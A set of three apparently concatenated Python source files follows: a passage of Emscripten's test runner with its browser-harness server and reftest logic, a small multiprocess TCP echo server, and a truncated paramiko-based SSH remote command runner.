assert(bdso != NULL);
cdso = dlopen("libc%(so)s", RTLD_GLOBAL);
assert(cdso != NULL);
bfunc = (void (*)())dlsym(bdso, "bfunc");
assert(bfunc != NULL);
cfunc = (void (*)())dlsym(cdso, "cfunc");
assert(cfunc != NULL);
bfunc();
cfunc();
return 0;
}
''' % locals(),
'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
def filtered_js_engines(self, js_engines=None):
if js_engines is None:
js_engines = shared.JS_ENGINES
for engine in js_engines:
assert type(engine) == list
for engine in self.banned_js_engines:
assert type(engine) in (list, type(None))
banned = [b[0] for b in self.banned_js_engines if b]
return [engine for engine in js_engines if engine and engine[0] not in banned]
def do_run_from_file(self, src, expected_output, *args, **kwargs):
if 'force_c' not in kwargs and os.path.splitext(src)[1] == '.c':
kwargs['force_c'] = True
logger.debug('do_run_from_file: %s' % src)
self.do_run(open(src).read(), open(expected_output).read(), *args, **kwargs)
def do_run_in_out_file_test(self, *path, **kwargs):
test_path = path_from_root(*path)
def find_files(*ext_list):
ret = None
count = 0
for ext in ext_list:
if os.path.isfile(test_path + ext):
ret = test_path + ext
count += 1
assert count > 0, ("No file found at {} with extension {}"
.format(test_path, ext_list))
assert count <= 1, ("Test file {} found with multiple valid extensions {}"
.format(test_path, ext_list))
return ret
src = find_files('.c', '.cpp')
output = find_files('.out', '.txt')
self.do_run_from_file(src, output, **kwargs)
## Does a complete test - builds, runs, checks output, etc.
def do_run(self, src, expected_output, args=[], output_nicerizer=None,
no_build=False, main_file=None, additional_files=[],
js_engines=None, post_build=None, basename='src.cpp', libraries=[],
includes=[], force_c=False, build_ll_hook=None,
assert_returncode=0, assert_identical=False, assert_all=False,
check_for_error=True):
if force_c or (main_file is not None and main_file[-2:]) == '.c':
basename = 'src.c'
if no_build:
if src:
js_file = src
else:
js_file = basename + '.o.js'
else:
dirname = self.get_dir()
filename = os.path.join(dirname, basename)
self.build(src, dirname, filename, main_file=main_file,
additional_files=additional_files, libraries=libraries,
includes=includes,
build_ll_hook=build_ll_hook, post_build=post_build)
js_file = filename + '.o.js'
self.assertExists(js_file)
engines = self.filtered_js_engines(js_engines)
# Make sure to get asm.js validation checks, using sm, even if not testing all vms.
if len(engines) > 1 and not self.use_all_engines:
if SPIDERMONKEY_ENGINE in engines and not self.is_wasm_backend():
engines = [SPIDERMONKEY_ENGINE]
else:
engines = engines[:1]
# In standalone mode, also add wasm vms as we should be able to run there too.
if self.get_setting('STANDALONE_WASM'):
# TODO once standalone wasm support is more stable, apply use_all_engines
# like with js engines, but for now as we bring it up, test in all of them
wasm_engines = shared.WASM_ENGINES
if len(wasm_engines) == 0:
logger.warning('no wasm engine was found to run the standalone part of this test')
engines += wasm_engines
if self.get_setting('WASM2C') and not EMTEST_LACKS_NATIVE_CLANG:
# compile the c file to a native executable.
c = shared.unsuffixed(js_file) + '.wasm.c'
executable = shared.unsuffixed(js_file) + '.exe'
cmd = [shared.CLANG_CC, c, '-o', executable] + clang_native.get_clang_native_args()
self.run_process(cmd, env=clang_native.get_clang_native_env())
# we can now run the executable directly, without an engine, which
# we indicate with None as the engine
engines += [[None]]
if len(engines) == 0:
self.skipTest('No JS engine present to run this test with. Check %s and the paths therein.' % EM_CONFIG)
for engine in engines:
js_output = self.run_js(js_file, engine, args, output_nicerizer=output_nicerizer, assert_returncode=assert_returncode)
js_output = js_output.replace('\r\n', '\n')
if expected_output:
try:
if assert_identical:
self.assertIdentical(expected_output, js_output)
elif assert_all:
for o in expected_output:
self.assertContained(o, js_output)
else:
self.assertContained(expected_output, js_output)
if check_for_error:
self.assertNotContained('ERROR', js_output)
except Exception:
print('(test did not pass in JS engine: %s)' % engine)
raise
def get_freetype_library(self):
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
return self.get_library(os.path.join('third_party', 'freetype'), os.path.join('objs', '.libs', 'libfreetype.a'), configure_args=['--disable-shared', '--without-zlib'])
def get_poppler_library(self, env_init=None):
# The fontconfig symbols are all missing from the poppler build
# e.g. FcConfigSubstitute
self.set_setting('ERROR_ON_UNDEFINED_SYMBOLS', 0)
self.emcc_args += [
'-I' + path_from_root('tests', 'third_party', 'freetype', 'include'),
'-I' + path_from_root('tests', 'third_party', 'poppler', 'include')
]
freetype = self.get_freetype_library()
# Poppler has some pretty glaring warning. Suppress them to keep the
# test output readable.
if '-Werror' in self.emcc_args:
self.emcc_args.remove('-Werror')
self.emcc_args += [
'-Wno-sentinel',
'-Wno-logical-not-parentheses',
'-Wno-unused-private-field',
'-Wno-tautological-compare',
'-Wno-unknown-pragmas',
]
env_init = env_init.copy() if env_init else {}
env_init['FONTCONFIG_CFLAGS'] = ' '
env_init['FONTCONFIG_LIBS'] = ' '
poppler = self.get_library(
os.path.join('third_party', 'poppler'),
[os.path.join('utils', 'pdftoppm.o'), os.path.join('utils', 'parseargs.o'), os.path.join('poppler', '.libs', 'libpoppler.a')],
env_init=env_init,
configure_args=['--disable-libjpeg', '--disable-libpng', '--disable-poppler-qt', '--disable-poppler-qt4', '--disable-cms', '--disable-cairo-output', '--disable-abiword-output', '--disable-shared'])
return poppler + freetype
def get_zlib_library(self):
if WINDOWS:
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'),
configure=[path_from_root('emconfigure.bat')],
configure_args=['cmake', '.'],
make=['mingw32-make'],
make_args=[])
return self.get_library(os.path.join('third_party', 'zlib'), os.path.join('libz.a'), make_args=['libz.a'])
# Run a server and a web page. When a test runs, we tell the server about it,
# which tells the web page, which then opens a window with the test. Doing
# it this way then allows the page to close() itself when done.
def harness_server_func(in_queue, out_queue, port):
class TestServerHandler(SimpleHTTPRequestHandler):
# Request header handler for default do_GET() path in
# SimpleHTTPRequestHandler.do_GET(self) below.
def send_head(self):
if self.path.endswith('.js'):
path = self.translate_path(self.path)
try:
f = open(path, 'rb')
except IOError:
self.send_error(404, "File not found: " + path)
return None
self.send_response(200)
self.send_header('Content-type', 'application/javascript')
self.send_header('Connection', 'close')
self.end_headers()
return f
else:
return SimpleHTTPRequestHandler.send_head(self)
# Add COOP, COEP, CORP, and no-caching headers
def end_headers(self):
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Cross-Origin-Opener-Policy', 'same-origin')
self.send_header('Cross-Origin-Embedder-Policy', 'require-corp')
self.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
return SimpleHTTPRequestHandler.end_headers(self)
def do_GET(self):
if self.path == '/run_harness':
if DEBUG:
print('[server startup]')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write(open(path_from_root('tests', 'browser_harness.html'), 'rb').read())
elif 'report_' in self.path:
# the test is reporting its result. first change dir away from the
# test dir, as it will be deleted now that the test is finishing, and
# if we got a ping at that time, we'd return an error
os.chdir(path_from_root())
# for debugging, tests may encode the result and their own url (window.location) as result|url
if '|' in self.path:
path, url = self.path.split('|', 1)
else:
path = self.path
url = '?'
if DEBUG:
print('[server response:', path, url, ']')
if out_queue.empty():
out_queue.put(path)
else:
# a badly-behaving test may send multiple xhrs with reported results; we just care
# about the first (if we queued the others, they might be read as responses for
# later tests, or maybe the test sends more than one in a racy manner).
# we place 'None' in the queue here so that the outside knows something went wrong
# (none is not a valid value otherwise; and we need the outside to know because if we
# raise an error in here, it is just swallowed in python's webserver code - we want
# the test to actually fail, which a webserver response can't do).
out_queue.put(None)
raise Exception('browser harness error, excessive response to server - test must be fixed! "%s"' % self.path)
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.send_header('Connection', 'close')
self.send_header('Expires', '-1')
self.end_headers()
self.wfile.write(b'OK')
elif 'stdout=' in self.path or 'stderr=' in self.path or 'exception=' in self.path:
'''
To get logging to the console from browser tests, add this to
print/printErr/the exception handler in src/shell.html:
var xhr = new XMLHttpRequest();
xhr.open('GET', encodeURI('http://localhost:8888?stdout=' + text));
xhr.send();
'''
print('[client logging:', unquote_plus(self.path), ']')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
elif self.path == '/check':
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
if not in_queue.empty():
# there is a new test ready to be served
url, dir = in_queue.get()
if DEBUG:
print('[queue command:', url, dir, ']')
assert in_queue.empty(), 'should not be any blockage - one test runs at a time'
assert out_queue.empty(), 'the single response from the last test was read'
# tell the browser to load the test
self.wfile.write(b'COMMAND:' + url)
# move us to the right place to serve the files for the new test
os.chdir(dir)
else:
# the browser must keep polling
self.wfile.write(b'(wait)')
else:
# Use SimpleHTTPServer default file serving operation for GET.
if DEBUG:
print('[simple HTTP serving:', unquote_plus(self.path), ']')
SimpleHTTPRequestHandler.do_GET(self)
def log_request(code=0, size=0):
# don't log; too noisy
pass
# allows streaming compilation to work
SimpleHTTPRequestHandler.extensions_map['.wasm'] = 'application/wasm'
httpd = HTTPServer(('localhost', port), TestServerHandler)
httpd.serve_forever() # test runner will kill us
class BrowserCore(RunnerCore):
# note how many tests hang / do not send an output. if many of these
# happen, likely something is broken and it is best to abort the test
# suite early, as otherwise we will wait for the timeout on every
# single test (hundreds of minutes)
MAX_UNRESPONSIVE_TESTS = 10
unresponsive_tests = 0
def __init__(self, *args, **kwargs):
super(BrowserCore, self).__init__(*args, **kwargs)
@staticmethod
def browser_open(url):
if not EMTEST_BROWSER:
logger.info('Using default system browser')
webbrowser.open_new(url)
return
browser_args = shlex.split(EMTEST_BROWSER)
# If the given browser is a scalar, treat it like one of the possible types
# from https://docs.python.org/2/library/webbrowser.html
if len(browser_args) == 1:
try:
# This throws if the type of browser isn't available
webbrowser.get(browser_args[0]).open_new(url)
logger.info('Using Emscripten browser: %s', browser_args[0])
return
except webbrowser.Error:
# Ignore the exception and fallback to the custom command logic
pass
# Else assume the given browser is a specific program with additional
# parameters and delegate to that
logger.info('Using Emscripten browser: %s', str(browser_args))
subprocess.Popen(browser_args + [url])
@classmethod
def setUpClass(cls):
super(BrowserCore, cls).setUpClass()
cls.also_asmjs = int(os.getenv('EMTEST_BROWSER_ALSO_ASMJS', '0')) == 1
cls.port = int(os.getenv('EMTEST_BROWSER_PORT', '8888'))
if not has_browser():
return
cls.browser_timeout = 60
cls.harness_in_queue = multiprocessing.Queue()
cls.harness_out_queue = multiprocessing.Queue()
cls.harness_server = multiprocessing.Process(target=harness_server_func, args=(cls.harness_in_queue, cls.harness_out_queue, cls.port))
cls.harness_server.start()
print('[Browser harness server on process %d]' % cls.harness_server.pid)
cls.browser_open('http://localhost:%s/run_harness' % cls.port)
@classmethod
def tearDownClass(cls):
super(BrowserCore, cls).tearDownClass()
if not has_browser():
return
cls.harness_server.terminate()
print('[Browser harness server terminated]')
if WINDOWS:
# On Windows, shutil.rmtree() in tearDown() raises this exception if we do not wait a bit:
# WindowsError: [Error 32] The process cannot access the file because it is being used by another process.
time.sleep(0.1)
def assert_out_queue_empty(self, who):
if not self.harness_out_queue.empty():
while not self.harness_out_queue.empty():
self.harness_out_queue.get()
raise Exception('excessive responses from %s' % who)
# @param tries_left: how many more times to try this test, if it fails. browser tests have
# many more causes of flakiness (in particular, they do not run
# synchronously, so we have a timeout, which can be hit if the VM
# we run on stalls temporarily), so we let each test try more than
# once by default
def run_browser(self, html_file, message, expectedResult=None, timeout=None, tries_left=1):
if not has_browser():
return
if BrowserCore.unresponsive_tests >= BrowserCore.MAX_UNRESPONSIVE_TESTS:
self.skipTest('too many unresponsive tests, skipping browser launch - check your setup!')
self.assert_out_queue_empty('previous test')
if DEBUG:
print('[browser launch:', html_file, ']')
if expectedResult is not None:
try:
self.harness_in_queue.put((
asbytes('http://localhost:%s/%s' % (self.port, html_file)),
self.get_dir()
))
received_output = False
output = '[no http server activity]'
start = time.time()
if timeout is None:
timeout = self.browser_timeout
while time.time() - start < timeout:
if not self.harness_out_queue.empty():
output = self.harness_out_queue.get()
received_output = True
break
time.sleep(0.1)
if not received_output:
BrowserCore.unresponsive_tests += 1
print('[unresponsive tests: %d]' % BrowserCore.unresponsive_tests)
if output is None:
# the browser harness reported an error already, and sent a None to tell
# us to also fail the test
raise Exception('failing test due to browser harness error')
if output.startswith('/report_result?skipped:'):
self.skipTest(unquote(output[len('/report_result?skipped:'):]).strip())
else:
# verify the result, and try again if we should do so
try:
self.assertIdenticalUrlEncoded(expectedResult, output)
except Exception as e:
if tries_left > 0:
print('[test error (see below), automatically retrying]')
print(e)
return self.run_browser(html_file, message, expectedResult, timeout, tries_left - 1)
else:
raise e
finally:
time.sleep(0.1) # see comment about Windows above
self.assert_out_queue_empty('this test')
else:
webbrowser.open_new(os.path.abspath(html_file))
print('A web browser window should have opened a page containing the results of a part of this test.')
print('You need to manually look at the page to see that it works ok: ' + message)
print('(sleeping for a bit to keep the directory alive for the web browser..)')
time.sleep(5)
print('(moving on..)')
def with_report_result(self, user_code):
return '''
#define EMTEST_PORT_NUMBER %(port)d
#include "%(report_header)s"
%(report_main)s
%(user_code)s
''' % {
'port': self.port,
'report_header': path_from_root('tests', 'report_result.h'),
'report_main': open(path_from_root('tests', 'report_result.cpp')).read(),
'user_code': user_code
}
# @manually_trigger If set, we do not assume we should run the reftest when main() is done.
# Instead, call doReftest() in JS yourself at the right time.
def reftest(self, expected, manually_trigger=False):
# make sure the pngs used here have no color correction, using e.g.
# pngcrush -rem gAMA -rem cHRM -rem iCCP -rem sRGB infile outfile
basename = os.path.basename(expected)
shutil.copyfile(expected, os.path.join(self.get_dir(), basename))
with open(os.path.join(self.get_dir(), 'reftest.js'), 'w') as out:
with open(path_from_root('tests', 'browser_reporting.js')) as reporting:
out.write('''
function doReftest() {
if (doReftest.done) return;
doReftest.done = true;
var img = new Image();
img.onload = function() {
assert(img.width == Module.canvas.width, 'Invalid width: ' + Module.canvas.width + ', should be ' + img.width);
assert(img.height == Module.canvas.height, 'Invalid height: ' + Module.canvas.height + ', should be ' + img.height);
var canvas = document.createElement('canvas');
canvas.width = img.width;
canvas.height = img.height;
var ctx = canvas.getContext('2d');
ctx.drawImage(img, 0, 0);
var expected = ctx.getImageData(0, 0, img.width, img.height).data;
var actualUrl = Module.canvas.toDataURL();
var actualImage = new Image();
actualImage.onload = function() {
/*
document.body.appendChild(img); // for comparisons
var div = document.createElement('div');
div.innerHTML = '^=expected, v=actual';
document.body.appendChild(div);
document.body.appendChild(actualImage); // to grab it for creating the test reference
*/
var actualCanvas = document.createElement('canvas');
actualCanvas.width = actualImage.width;
actualCanvas.height = actualImage.height;
var actualCtx = actualCanvas.getContext('2d');
actualCtx.drawImage(actualImage, 0, 0);
var actual = actualCtx.getImageData(0, 0, actualImage.width, actualImage.height).data;
var total = 0;
var width = img.width;
var height = img.height;
for (var x = 0; x < width; x++) {
for (var y = 0; y < height; y++) {
total += Math.abs(expected[y*width*4 + x*4 + 0] - actual[y*width*4 + x*4 + 0]);
total += Math.abs(expected[y*width*4 + x*4 + 1] - actual[y*width*4 + x*4 + 1]);
total += Math.abs(expected[y*width*4 + x*4 + 2] - actual[y*width*4 + x*4 + 2]);
}
}
var wrong = Math.floor(total / (img.width*img.height*3)); // floor, to allow some margin of error for antialiasing
// If the main JS file is in a worker, or modularize, then we need to supply our own reporting logic.
if (typeof reportResultToServer === 'undefined') {
(function() {
%s
reportResultToServer(wrong);
})();
} else {
reportResultToServer(wrong);
}
};
actualImage.src = actualUrl;
}
img.src = '%s';
};
// Automatically trigger the reftest?
if (!%s) {
// Yes, automatically
Module['postRun'] = doReftest;
if (typeof WebGLClient !== 'undefined') {
// trigger reftest from RAF as well, needed for workers where there is no pre|postRun on the main thread
var realRAF = window.requestAnimationFrame;
window.requestAnimationFrame = /** @suppress{checkTypes} */ (function(func) {
realRAF(function() {
func();
realRAF(doReftest);
});
});
// trigger reftest from canvas render too, for workers not doing GL
var realWOM = worker.onmessage;
worker.onmessage = function(event) {
realWOM(event);
if (event.data.target === 'canvas' && event.data.op === 'render') {
realRAF(doReftest);
}
};
}
} else {
// Manually trigger the reftest.
// The user will call it.
// Add an event loop iteration to ensure rendering, so users don't need to bother.
var realDoReftest = doReftest;
doReftest = function() {
setTimeout(realDoReftest, 1);
};
}
''' % (reporting.read(), basename, int(manually_trigger)))
def compile_btest(self, args):
self.run_process([EMCC] + args + ['--pre-js', path_from_root('tests', 'browser_reporting.js')])
def btest(self, filename, expected=None, reference=None, force_c=False,
reference_slack=0, manual_reference=False, post_build=None,
args=[], outfile='test.html', message='.', also_proxied=False,
url_suffix='', timeout=None, also_asmjs=False,
manually_trigger_reftest=False):
assert expected or reference, 'a btest must either expect an output, or have a reference image'
# if we are provided the source and not a path, use that
filename_is_src = '\n' in filename
src = filename if filename_is_src else ''
original_args = args[:]
if 'WASM=0' not in args:
# Filter out separate-asm, which is implied by wasm
args = [a for a in args if a != '--separate-asm']
# add in support for reporting results. this adds as an include a header so testcases can
# use REPORT_RESULT, and also adds a cpp file to be compiled alongside the testcase, which
# contains the implementation of REPORT_RESULT (we can't just include that implementation in
# the header as there may be multiple files being compiled here).
args += ['-DEMTEST_PORT_NUMBER=%d' % self.port,
'-include', path_from_root('tests', 'report_result.h'),
path_from_root('tests', 'report_result.cpp')]
if filename_is_src:
filepath = os.path.join(self.get_dir(), 'main.c' if force_c else 'main.cpp')
with open(filepath, 'w') as f:
f.write(src)
else:
filepath = path_from_root('tests', filename)
if reference:
self.reference = reference
expected = [str(i) for i in range(0, reference_slack + 1)]
self.reftest(path_from_root('tests', reference), manually_trigger=manually_trigger_reftest)
if not manual_reference:
args = args + ['--pre-js', 'reftest.js', '-s', 'GL_TESTING=1']
all_args = ['-s', 'IN_TEST_HARNESS=1', filepath, '-o', outfile] + args
# print('all args:', all_args)
try_delete(outfile)
self.compile_btest(all_args)
self.assertExists(outfile)
if post_build:
post_build()
if not isinstance(expected, list):
expected = [expected]
self.run_browser(outfile + url_suffix, message, ['/report_result?' + e for e in expected], timeout=timeout)
# Tests can opt into being run under asmjs as well
if 'WASM=0' not in args and (also_asmjs or self.also_asmjs):
print('WASM=0')
self.btest(filename, expected, reference, force_c, reference_slack, manual_reference, post_build,
original_args + ['-s', 'WASM=0'], outfile, message, also_proxied=False, timeout=timeout)
if also_proxied:
print('proxied...')
if reference:
assert not manual_reference
manual_reference = True
assert not post_build
post_build = self.post_manual_reftest
# run proxied
self.btest(filename, expected, reference, force_c, reference_slack, manual_reference, post_build,
original_args + ['--proxy-to-worker', '-s', 'GL_TESTING=1'], outfile, message, timeout=timeout)
###################################################################################################
def build_library(name,
build_dir,
output_dir,
generated_libs,
configure=['sh', './configure'],
configure_args=[],
make=['make'],
make_args=[],
cache=None,
cache_name=None,
env_init={},
native=False,
cflags=[]):
"""Build a library and cache the result. We build the library file
once and cache it for all our tests. (We cache in memory since the test
directory is destroyed and recreated for each test. Note that we cache
separately for different compilers). This cache is just during the test
runner. There is a different concept of caching as well, see |Cache|.
"""
if type(generated_libs) is not list:
generated_libs = [generated_libs]
source_dir = path_from_root('tests', name.replace('_native', ''))
temp_dir = build_dir
project_dir = os.path.join(temp_dir, name)
if os.path.exists(project_dir):
shutil.rmtree(project_dir)
shutil.copytree(source_dir, project_dir) # Useful in debugging sometimes to comment this out, and two lines above
generated_libs = [os.path.join(project_dir, lib) for lib in generated_libs]
if native:
env = clang_native.get_clang_native_env()
else:
env = building.get_building_env(cflags=cflags)
for k, v in env_init.items():
env[k] = v
if configure:
try:
with open(os.path.join(project_dir, 'configure_out'), 'w') as out:
with open(os.path.join(project_dir, 'configure_err'), 'w') as err:
stdout = out if EM_BUILD_VERBOSE < 2 else None
stderr = err if EM_BUILD_VERBOSE < 1 else None
building.configure(configure + configure_args, env=env,
stdout=stdout,
stderr=stderr,
cwd=project_dir)
except subprocess.CalledProcessError:
with open(os.path.join(project_dir, 'configure_out')) as f:
print('-- configure stdout --')
print(f.read())
print('-- end configure stdout --')
with open(os.path.join(project_dir, 'configure_err')) as f:
print('-- configure stderr --')
print(f.read())
print('-- end configure stderr --')
raise
def open_make_out(mode='r'):
return open(os.path.join(project_dir, 'make.out'), mode)
def open_make_err(mode='r'):
return open(os.path.join(project_dir, 'make.err'), mode)
if EM_BUILD_VERBOSE >= 3:
make_args += ['VERBOSE=1']
try:
with open_make_out('w') as make_out:
with open_make_err('w') as make_err:
stdout = make_out if EM_BUILD_VERBOSE < 2 else None
stderr = make_err if EM_BUILD_VERBOSE < 1 else None
building.make(make + make_args, stdout=stdout, stderr=stderr, env=env,
cwd=project_dir)
except subprocess.CalledProcessError:
with open_make_out() as f:
print('-- make stdout --')
print(f.read())
print('-- end make stdout --')
with open_make_err() as f:
print('-- make stderr --')
print(f.read())
print('-- end stderr --')
raise
if cache is not None:
cache[cache_name] = []
for f in generated_libs:
basename = os.path.basename(f)
cache[cache_name].append((basename, open(f, 'rb').read()))
return generated_libs
def check_js_engines():
working_engines = list(filter(jsrun.check_engine, shared.JS_ENGINES))
if len(working_engines) < len(shared.JS_ENGINES):
print('Not all the JS engines in JS_ENGINES appears to work.')
exit(1)
if EMTEST_ALL_ENGINES:
print('(using ALL js engines)')
else:
logger.warning('use EMTEST_ALL_ENGINES=1 in the env to run against all JS '
'engines, which is slower but provides more coverage')
def get_and_import_modules():
modules = []
for filename in glob.glob(os.path.join(os.path.dirname(__file__), 'test*.py')):
module_dir, module_file = os.path.split(filename)
module_name, module_ext = os.path.splitext(module_file)
__import__(module_name)
modules.append(sys.modules[module_name])
return modules
def get_all_tests(modules):
# Create a list of all known tests so that we can choose from them based on a wildcard search
all_tests = []
suites = core_test_modes + non_core_test_modes
for m in modules:
for s in suites:
if hasattr(m, s):
tests = [t for t in dir(getattr(m, s)) if t.startswith('test_')]
all_tests += [s + '.' + t for t in tests]
return all_tests
def tests_with_expanded_wildcards(args, all_tests):
# Process wildcards, e.g. "browser.test_pthread_*" should expand to list all pthread tests
new_args = []
for i, arg in enumerate(args):
if '*' in arg:
if arg.startswith('skip:'):
arg = arg[5:]
matching_tests = fnmatch.filter(all_tests, arg)
new_args += ['skip:' + t for t in matching_tests]
else:
new_args += fnmatch.filter(all_tests, arg)
else:
new_args += [arg]
if not new_args and args:
print('No tests found to run in set: ' + str(args))
sys.exit(1)
return new_args
def skip_requested_tests(args, modules):
for i, arg in enumerate(args):
if arg.startswith('skip:'):
which = [arg.split('skip:')[1]]
print(','.join(which), file=sys.stderr)
for test in which:
print('will skip "%s"' % test, file=sys.stderr)
suite_name, test_name = test.split('.')
for m in modules:
try:
suite = getattr(m, suite_name)
setattr(suite, test_name, lambda s: s.skipTest("requested to be skipped"))
break
except AttributeError:
pass
args[i] = None
return [a for a in args if a is not None]
def args_for_random_tests(args, modules):
if not args:
return args
first = args[0]
if first.startswith('random'):
random_arg = first[6:]
num_tests, base_module, relevant_modes = get_random_test_parameters(random_arg)
for m in modules:
if hasattr(m, base_module):
base = getattr(m, base_module)
new_args = choose_random_tests(base, num_tests, relevant_modes)
print_random_test_statistics(num_tests)
return new_args
return args
def get_random_test_parameters(arg):
num_tests = 1
base_module = default_core_test_mode
relevant_modes = core_test_modes
if len(arg):
num_str = arg
if arg.startswith('other'):
base_module = 'other'
relevant_modes = ['other']
num_str = arg.replace('other', '')
elif arg.startswith('browser'):
base_module = 'browser'
relevant_modes = ['browser']
num_str = arg.replace('browser', '')
num_tests = int(num_str)
return num_tests, base_module, relevant_modes
def choose_random_tests(base, num_tests, relevant_modes):
tests = [t for t in dir(base) if t.startswith('test_')]
print()
chosen = set()
while len(chosen) < num_tests:
test = random.choice(tests)
mode = random.choice(relevant_modes)
new_test = mode + '.' + test
before = len(chosen)
chosen.add(new_test)
if len(chosen) > before:
print('* ' + new_test)
else:
# we may have hit the limit
if len(chosen) == len(tests) * len(relevant_modes):
print('(all possible tests chosen! %d = %d*%d)' % (len(chosen), len(tests), len(relevant_modes)))
break
return list(chosen)
def print_random_test_statistics(num_tests):
std = 0.5 / math.sqrt(num_tests)
expected = 100.0 * (1.0 - std)
print()
print('running those %d randomly-selected tests. if they all pass, then there is a '
'greater than 95%% chance that at least %.2f%% of the test suite will pass'
% (num_tests, expected))
print()
def show():
print('if all tests passed then there is a greater than 95%% chance that at least '
'%.2f%% of the test suite will pass'
% (expected))
atexit.register(show)
def load_test_suites(args, modules):
loader = unittest.TestLoader()
unmatched_test_names = set(args)
suites = []
for m in modules:
names_in_module = []
for name in list(unmatched_test_names):
try:
operator.attrgetter(name)(m)
names_in_module.append(name)
unmatched_test_names.remove(name)
except AttributeError:
pass
if len(names_in_module):
loaded_tests = loader.loadTestsFromNames(sorted(names_in_module), m)
tests = flattened_tests(loaded_tests)
suite = suite_for_module(m, tests)
for test in tests:
suite.addTest(test)
suites.append((m.__name__, suite))
return suites, unmatched_test_names
def flattened_tests(loaded_tests):
tests = []
for subsuite in loaded_tests:
for test in subsuite:
tests.append(test)
return tests
def suite_for_module(module, tests):
suite_supported = module.__name__ in ('test_core', 'test_other')
if not EMTEST_SAVE_DIR:
has_multiple_tests = len(tests) > 1
has_multiple_cores = parallel_testsuite.num_cores() > 1
if suite_supported and has_multiple_tests and has_multiple_cores:
return parallel_testsuite.ParallelTestSuite(len(tests))
return unittest.TestSuite()
def run_tests(options, suites):
resultMessages = []
num_failures = 0
print('Test suites:')
print([s[0] for s in suites])
# Run the discovered tests
testRunner = unittest.TextTestRunner(verbosity=2)
for mod_name, suite in suites:
print('Running %s: (%s tests)' % (mod_name, suite.countTestCases()))
res = testRunner.run(suite)
msg = ('%s: %s run, %s errors, %s failures, %s skipped' %
(mod_name, res.testsRun, len(res.errors), len(res.failures), len(res.skipped)))
num_failures += len(res.errors) + len(res.failures)
resultMessages.append(msg)
if len(resultMessages) > 1:
print('====================')
print()
print('TEST SUMMARY')
for msg in resultMessages:
print(' ' + msg)
# Return the number of failures as the process exit code for automating success/failure reporting.
return min(num_failures, 255)
def parse_args(args):
parser = argparse.ArgumentParser(prog='runner.py', description=__doc__)
parser.add_argument('tests', nargs='*')
return parser.parse_args()
def main(args):
options = parse_args(args)
check_js_engines()
def prepend_default(arg):
if arg.startswith('test_'):
return default_core_test_mode + '.' + arg
return arg
tests = [prepend_default(t) for t in options.tests]
modules = get_and_import_modules()
all_tests = get_all_tests(modules)
tests = tests_with_expanded_wildcards(tests, all_tests)
tests = skip_requested_tests(tests, modules)
tests = args_for_random_tests(tests, modules)
suites, unmatched_tests = load_test_suites(tests, modules)
if unmatched_tests:
print('ERROR: could not find the following tests: ' + ' '.join(unmatched_tests))
return 1
return run_tests(options, suites)
if __name__ == '__main__':
try:
sys.exit(main(sys.argv))
except KeyboardInterrupt:
logger.warning('KeyboardInterrupt')
sys.exit(1)
|
multi_echo_server.py
|
#!/usr/bin/env python3
import socket
import time
from multiprocessing import Process
HOST = ""
PORT = 8001
BUFFER_SIZE = 1024
def main():
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
s.listen(2)
while True:
conn, addr = s.accept()
p = Process(target=handle_echo, args=(addr, conn))
p.daemon = True
p.start()
print("Started process ", p)
def handle_echo(addr, conn):
print("Connected by", addr)
full_data = b""
while True:
data = conn.recv(BUFFER_SIZE)
# print(data)
if not data: break
full_data += data
# conn.send(data)
time.sleep(0.5)
conn.sendall(full_data)
conn.shutdown(socket.SHUT_RDWR)
#conn.close()
if __name__ == "__main__":
main()
|
remote_runner.py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import io
import sys
from threading import Thread
import paramiko
class RemoteRunner:
def __init__(self, ipaddress=None, username=None, password=None,
command=None, verbose=True, logfile=None,
timeout=None, ):
self.ipaddress = ipaddress
self.username = username
self.password = password
self.command = command
self.verbose = verbose
self.timeout = timeout
if logfile:
self.logfile = open(logfile, 'w')
else:
self.logfile = None
self.all = all
self.machine = None
self.ssh = None
self.buffer = None
def connect_ssh(self):
self.ssh = paramiko.SSHClient()
self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
self.print("connecting to target device at " + self.ipaddress)
self.ssh.connect(self.ipaddress, username=self.username, password=self.password)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
if self.ssh:
self.ssh.close()
def close_ssh(self):
self.ssh.close()
def logstream(self, stream):
try:
while True:
out = stream.readline()
if out:
msg = out.rstrip('\n')
self.print(msg)
else:
break
except:
errorType, value, traceback = sys.exc_info()
msg = "### logstream exception: %s: %s" % (str(errorType), str(value))
self.print(msg)
def exec_remote_command(self, cmd):
self.print("remote: " + cmd)
self.buffer = io.StringIO()
try:
stdin, stdout, stderr = self.ssh.exec_command(cmd, timeout=self.timeout)
stdout_thread = Thread(target=self.logstream, args=(stdout,))
stderr_thread = Thread(target=self.logstream, args=(stderr,))
stdout_thread.start()
stderr_thread.start()
while stdout_thread.isAlive() or stderr_thread.isAlive():
pass
except:
errorType, value, traceback = sys.exc_info()
msg = "### exec_remote_command exception: %s: %s" % (str(errorType), str(value))
self.print(msg)
result = self.buffer.getvalue().split('\n')
self.buffer = None
return result
def print(self, output):
if self.verbose:
print(output)
if self.buffer:
self.buffer.write(output + "\n")
if self.logfile:
self.logfile.write(output + "\n")
def run_command(self):
output = []
try:
self.connect_ssh()
if self.start_clean:
self.clean_target()
self.publish_bits()
if self.command:
if self.target_dir:
self.exec_remote_command("cd {} && chmod u+x ./{}".format(
self.target_dir, self.command.split(" ")[0]))
output = self.exec_remote_command("cd {} && ./{}".format(
self.target_dir, self.command))
else:
output = self.exec_remote_command(self.command)
self.copy_files()
if self.cleanup:
self.clean_target()
self.close_ssh()
except:
errorType, value, traceback = sys.exc_info()
msg = "### run_command exception: %s: %s" % (str(errorType), str(value) + "\n" + str(traceback))
